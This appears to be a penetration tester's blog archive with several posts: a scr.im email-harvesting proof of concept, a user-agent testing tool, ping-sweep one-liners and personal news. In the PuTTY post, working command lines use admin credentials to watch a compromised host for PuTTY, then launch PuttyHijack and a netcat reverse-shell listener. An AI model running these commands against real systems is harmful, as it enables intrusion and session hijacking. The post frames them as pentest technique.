Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: script

scr.im revisited

About a year back (Oct 2009) I wrote a quick technical review of the scr.im email protection service. I’ll save you the pain of rehashing it all here, and the pain of rewriting it all. If you’ve not read it, head over here to take a quick look!

There were a number of flaws in the way scr.im used captchas, as well as the way it handles requests (allowing multiple requests with the same token etc…). At the time I wrote the following :

I don’t think it would take much for a good scripter (that rules me out most likely) to script up something that could quite simply go through and harvest addresses from the site

Well I’m still not a good scripter… but I’m learning. So in the theme of #HackToLearn, I spent a few hours playing with Python and BeautifulSoup last night. At the end of it, I had a workable Proof of Concept script that does just what it says on the tin…. enter the scr.im ID  you want extracted, and it’ll return you the email address sitting behind the captcha. I called this PoC scr.im-jim ( a play on the slim-jim tool used to break into cars), because it sounded cool, and because I was really tired at the time!

You can find out more about the tool, watch the video demo and download the source from the scripts/tools section of the site.

links:

Advertisements

UATester Alpha

Well I’ve held out long enough tweaking and playing, it’s time to hang my head in shame and release my UA-Tester Script for the world to laugh at and play with.

A few things before I run through what the tool does and why I thought it was worth writing.

  • This is only my second attempt at Python scripting, so don’t expect quality smooth code (yet)
  • It’s an Alpha release…. i.e. it will probably suck and never work.
  • I wrote this because I want to improve my Python fu.
    • I’d love constructive criticism
    • Hints and requests are always well received… but may be ignored 😉
    • If you hate it, fail to see the point in it, or are just generally negative –> rm UAtester.py

So with that out of the way, what is UA-Tester?

UA-Tester was something I’ve been thinking of for a while due to the increase in mobile technology. A number of high-profile sites (twitter, facebook, google, and even Microsoft) offer mobile versions of their sites and functionality. Normally this wouldn’t be something you’d care about, but as a penetration tester or security researcher, you need to make sure you’re covering all the bases and getting full coverage when looking at web applications. I’ll give some examples in the following sections that should help clarify things I hope.

As you can see in the screenshot, UA-Tester will begin by connecting to the URL provided to it through the command line and returning some information about what response it receives. It does this initial connection using a standard (non-specific) user-agent string (in this case Mozilla/5.0). As you can see in the screenshot, the tool returns the final URL (in this case different from the one entered through the command line), as well as the initial response code (302 Found) and information such as Content-Type, Server header (if present) and the length/MD5 of the data portion of the response. I’m currently looking to expand this to also check and return headers such as X-XSS-Protection, cookie names and others that might be useful (cache, etc…).

The tool will then re-run the same request 3 times to ensure that the response are stable (to prevent false-positives in the event of advertising, rotating content, or general connection issues). Without stable responses, it’s hard to tell if the site is responding differently depending on the user-agent string used.

With the foundations completed, the tool will then check the URL provided using either a list provided by the user (-u at the command line, example .: -u ./useragents.lst) or a collection of default user-agent strings (and by default I mean, a random and interesting selection I’ve been using for testing) if no filename is given. It is also possible to pass the -s option and provide a single user-agent string to test (example .: -s googlebot/2.1).

A connection is made using each of the supplied/default user-agent strings in turn, and the differences between the original reference connection, and the new user-agent string are returned to the user. It is also possible to use verbose mode to see the entire dataset returned for use in manual data gathering or correlation.

The results of this are then returned to the user showing the User-Agent string being checked and any responses that differ from the reference connection (the one used to check the stability of the connection).

As you can see by the screenshot, using the user-agent string “jBrowser-WAP” the remote server (in this case http://www.microsoft.com) responds with a different final URL (forwarding the user to a mobile version of the site) and also shows that the version of IIS in use is now 7.0 instead of the originally reported IIS 7.5. This could offer a number of advantages for penetration testers as you can imagine. Not only are mobile versions of web applications commonly less secure (missing protections against things like click-jacking for example), but as can be seen here, may also offer a completely new Infrastructure that could be vulnerable when the main site isn’t.

Now, what this script does is nothing new. I’m sure most readers here are already aware that this can be achieved through the use of something like Burp Intruder. Hope fully though, you’ll find this tool at least mildly useful for initial checks and scoping. I know it’s something I’ll be using to make sure I’m covering 100% of the application and functionality and not just limiting myself to the homepage as seen from Internet Explorer or Firefox.

./UATester.py -h

This tool is designed to automatically check a given URL using a list of standard

and non-standard User Agent strings provided by the user (1 per line).

The results of these checks are then reported to the user for further manual

analysis where required. Gathered data includes response codes, resulting URL in

the case of a 30x response, MD5 and length of response body, and select Server headers


Usage .:

-u / –url Complete URL

-f / –file <Path to User Agent file> / If no file is provided, defaults will be used

-s / –single provide a single user-agent string (may need to be contained in quotes in specific circumstances)

-v / –verbose results

–debug See debug messages


Example .:

./UATester.py -u http://www.example.com -f ./useragentlist.txt -v

./UATester.py -u https://www.yourserver.com

./UATester.py -u http://www.defaultserver.com -v –debug

./UATester.py -u https://www.google.com -s “MySpecialUserAgent”

I’d like to thank all the Alpha testers who helped with the fine tuning and comments so far… @Digininja, @Markofu, @DaleaPearson@Acanthephyra, and others. Much appreciated!

Todo:

  • Sort the output… not happy with the current way data is returned to the user (confusing, too much data for a table)
  • Output to a logfile for offline correlation (XML ?)
  • Add proxy support
  • Check and return information on additional headers, cookies and cache directives
  • Possibly work on integration with W3AF (Already Python based)

Links:

PuTTY, oh PuTTY, where art thou ?

Don’t you just hate it when you’ve got that perfect exploit and the user just refuses to play ball. They’re never using the right application at the right time. It’s just so inconsiderate of them, and frankly, a waste of our time to be sitting and waiting for them all the time. All jesting aside, it’s a problem I’ve come across a few times when performing penetration tests, as I’m sure many people have. Sometimes you just can’t run a client-side exploit without an action from the client.

I was reading the excellent CarnalOwnage blog and came across a post about the newly released PuTTY Hijack tool from Insomnia. I’ve not had a chance to play with it myself as I’ve got a few other things on the boil right now. Including my SANS SEC:560 exam sometime in the next month. Anyway, back to the point. The PuTTY hijack tool relies on the user to be running a version of PuTTY at the time the exploit is run. Sounds straight forward, but as we’ll already covered, those users are never running on the same timescales we are.

To assist in using this tool at just the right time (i.e. when the user starts up PuTTY) you can use scripts to monitor the running processes until the user starts the software. Once the user opens the correct toolthe script can then kick off the client-side exploit and it’s game over. With this in mind I’ve created a couple small script (all at the command line) to check if a copy of PuTTY is running. Thee scripts can easily be changed to monitor for other processes as desired. That’s the beauty of scripts after all.

One of the downsides of having to monitor for specific processes is that you will need to already have local access to the remote system to run the script and check for an instance of PuTTY. If you want to run the monitoring remotely then you’re going to have to get local admin permissions as well. However getting admin permissions on the remote machine isn’t really the main point of this attack. The point is to use a client-side exploit to launch off from an already compromised system onto the next target, one that you don’t already have admin/root on.

To script up the attack you can do use a couple of different methods. If you’re worried about running a monitoring process on the already compromised box for any reason (the process or service could be discovered etc…) and would rather make some noise on the network instead, you can use the wmi-client (sudo apt-get install wmi-client under Debian style distros) or you can download a copy of winexe (if it’s not already installed by default) and do the monitoring remotely from a Linux system. The following command string connects to the remote server and grabs the list of running processes. It will continue to check for the process until somebody starts PuTTY on the remote box. It then kicks off a remote job to start a reverse shell back to your machine (netcat is automatically started to receive the connection on port 2222). As alreay mentioned, this method will require admin access to the remote system to perform the monitoring and kick off the attack program.

res="$(winexe -U DOMAIN/Administrator%Password //10.10.10.10 "wmic process list brief" | grep -i putty | grep -v grep | wc -l)"
&& while $result -eq 0 ]; do echo "PuTTY not running. Waiting 10 seconds before recheck"; sleep 10; done; nc -l -p 2222;
winexe -U DOMAIN/Administrator%Password //10.10.10.10 "/pathto/PuttyHijack 10.10.10.10 2222"

*This should all be on one line or in a shell script)

Given more time I’m sure somebody much more technically savvy than me (and a better programmer for sure) will come up with a better method of doing the same thing. Until then, this is better then nothing, or a good start depending on your opinions.

The other way to accomplish the same task is to run a similar monitoring job on the compromised Windows host. This will be easy to discover if the person is checking running processes or services on the machine. Then again, it will reduce the traffic compared to remote monitoring and the chances of been seen by IDS system or curious Network Engineer are reduced. It might also be your only option if you’re already tunneling through a number of pivot points on the way to the machine. It starts to get messy with all those netcat pivots points and backpipes after a while. The following 2 Windows commands should loop until putty.exe is seen and then kick off the puttyhijack program. How you run these is up to you. Options include AT command, Scheduled task or install it as a service using the SC command.

FOR /L %i in (1,0,2) do @wmic process list brief | findstr "putty.exe" && c:\pathto\PuttyHijack 10.10.10.10 2222 && exit

You can also fun the command using tasklist instead of  WMIC on older boxes.

FOR /L %i in (1,0,2) do @tasklist| findstr "putty.exe"&& c:\pathto\PuttyHijack 10.10.10.10 2222 && exit

You can always tag on further commands to run once a putty session is seen. Everything before the exit is run once the task is found as as long as the findstr command fails (i.e. finds nothing) then it will fail the check made by the && (only run if previous command succeeds). Have fun with it, and let me know if you make anything good out of it 😉

All props to the CarnalOwnage blog for initially bringing this to my attention and Ed Skoudis for the Command Line KungFu. Without it, you’re just bait…

Recap…. move on

So as it’s been a while since I took my hiatus, I need to bring everybody up to speed on what’s been happening the past few months. As I’m getting old and my memory isn’t what it used to be, I’ll try and be brief and expand on certain topics moving forward.

SANS Amsterdam

After some discussions with work we agreed that attending the new SANS 560 “Penetration Testing and Ethical Hacking” class would be a good thing. Well, I convinced myself it would be good, and then.. well you get the clue. The course was held near to the airport in Amsterdam and was great fun on all levels. Although amongst the fun nights on the town, coffee shops and interesting shows, I learned a lot. The course was listed as one of the most technical offered by SANS and although it didn’t seem to technical at the time (thanks to the excellent course material by Ed Skoudis, and the few relaxed and informative presentation by John Strand), however as I begin to renew the topics for the exam, things aren’t as easy as they seemed at the course. That said, I’m sure I’ll do well in the exam, as I’m hoping to do work with SANS again in the future, possibly as a Mentor or as part of the work/learn program.

My first Article

Some people already know that I decided to take a stab at writing something for a magazine a few months back. The process of writing was a little harder than I thought, and I’m sure my girlfriend and parents are happy it’s over. I think I emailed my father at least 4 copies to proof read, most of them changing so quickly that he could never finish reading one before a new draft was ready. Still, things are looking up as Linux Pro Magazine in the US will be running it in the next edition (hopefully). It kind of ran over a little on the word count.. if you ask for a few pages at 800 words a page and get about 5,000 words, then it can be hard to squeeze in 😉 Still look out for a Snort Intrusion Detection article in a shop near you soon…. for those already using Snort or other IDS’s, this was a basic setup article, so no new ground broken for the first article. Maybe next time.

Work, life and everything in-between

It’s nice to live in a country were you can go for a swim in a lake when it’s hot…. nothing nicer than just sitting by a lake and relaying (which I hope to do this weekend if the weather holds). The downside is, I’m English. We just tend to turn bright red, peel and then get pale again. Still, better than always being white eh 😉 Work is challenging as usual. My German skills are (hopefully) getting a little better as time goes past, and learning new things is always a plus. Anyway, enough about work…. Gika (my girlfriend) has just finished University and it’s starting full-time at a web-content provider in the next few weeks. I’m very proud of her, as it’s been tough the last 3 years, dealing with University and me on-top. After all in our relationship I’ve lived in 3 different countries. If that’s not stressful then what is 😉 I like where I’m at now and don’t think I’d be anywhere near this place in my life, career and mind without her.

So expect some technical content coming up soon… it’s been too long since I’ve posted a command-line into this blog. So I’ll leave you with this to keep you busy.

for /F %i IN (hostname.txt) DO @ping -n 1 -w 500 %i | find /I “reply”

for /L %i IN (1,1,255) DO @ping -n 1 -w 500 192.168.0.%i | find /I “reply”

They’re quick and dirty… but if you need a ping sweep quick sharp, it’s tell you what’s up and what’s not. The first will do all hosts listed in a file, single ICMP packet with a timeout of 500ms. The second does the same ping but using all IP addresses from 192.168.0.1~255. The FIND command filters the responses to only inform you of valid replies. For some much better examples you should checkout the Ed Skoudis presentations on command-line kung-fu. Check the SANS website.